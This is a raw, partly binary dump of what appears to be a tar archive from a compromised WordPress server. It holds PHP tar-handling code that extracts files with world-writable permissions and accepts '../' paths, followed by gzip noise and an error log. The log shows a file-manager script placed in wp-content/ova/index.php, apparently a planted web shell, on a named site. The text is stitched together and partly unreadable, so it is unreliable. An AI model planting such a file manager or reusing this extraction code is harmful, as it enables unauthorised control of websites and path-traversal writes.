'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } error_log.tar.gz000064400000000556151442366610007703 0ustar00OK0w^ozXdrUNăȺwmg$@!%˟~B":}i;GʦB%hU[l4Q+փT+& ͲY0g'Iфr(19I ű``, N44 `(:! dh,8:`&b@ 8zMerror_log000064400000020654151442366610006500 0ustar00[14-Feb-2026 22:56:59 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:25:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:27:47 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:27:48 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 00:27:48 UTC] PHP Warning: Undefined variable $ext in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 1118 [15-Feb-2026 01:58:35 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 01:59:25 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 01:59:36 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 01:59:39 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 01:59:54 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 02:16:45 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 218 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 219 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 220 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 221 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 222 [15-Feb-2026 02:16:45 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 223 [15-Feb-2026 02:18:35 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 218 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 219 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 220 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 221 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 222 [15-Feb-2026 02:18:35 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php:1) in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 223 [15-Feb-2026 03:29:53 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/ampckwxt/lumenelectronicjewelry.com/wp-content/ova/index.php on line 91